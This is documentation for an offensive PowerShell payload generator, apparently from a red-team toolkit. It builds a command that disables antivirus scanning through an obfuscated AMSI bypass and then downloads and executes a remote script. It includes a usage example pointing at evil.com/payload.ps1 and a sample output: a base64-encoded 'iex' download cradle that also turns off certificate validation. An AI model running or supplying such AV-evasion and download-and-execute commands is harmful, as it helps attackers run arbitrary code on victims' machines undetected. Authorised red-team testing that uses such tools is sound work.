Description
Generates a PowerShell command that will download and execute the PowerShell script hosted at the specified URL after first disabling AV interference with an AMSI bypass.
Overview
This pipeline takes in a URL to a PowerShell script you want to run. It generates a PowerShell command that will trigger the ‘ps_generic_cradle’ pipeline with the provided URL. That pipeline applies an obfuscated AMSI bypass and then downloads and executes the script located at the specified URL.
There are two supported methods:
- Staged: Command -> PowerShell Downloader -> Bypasses -> Your Target Script
- Embedded: Command -> Bypasses -> Your Target Script
Parameters
| Parameter Name | Type | Description |
|---|---|---|
| URL | string | The URL for the PowerShell script to run. This parameter is mandatory. |
| Type | string | Staged will pull the cradle down over the network, while the Embedded type includes the cradle in the command itself. Options: ‘Staged’, ‘Embedded’. Default: ‘Staged’. |
| BypassTechnique | PwshAmsiBypassTechnique | The specific AMSI bypass technique to use. Default: ‘AmsiScanBufferStringReplace’. |
Example
This example shows how to generate a PowerShell command to download and execute a PowerShell script located at https://www.evil.com/payload.ps1.
Get-Payload 'ps_generic_cradle_command' -Args @{
URL = 'https://www.evil.com/payload.ps1'
}
While each iteration may be different due to different techniques being used, the output will look something similar to this:
powershell.exe -ExecutionPolicy Bypass -Command "iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrID0geyR0cnVlfTsgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xL3N0YXRpYy9yZXNvdXJjZXMvcHNfZ2VuZXJpY19jcmFkbGU/VVJMPWh0dHBzJTNhJTJmJTJmd3d3LmV2aWwuY29tJTJmcGF5bG9hZC5wczEmYnVpbGQ9aHR0cCcpIHwgaWV4')))"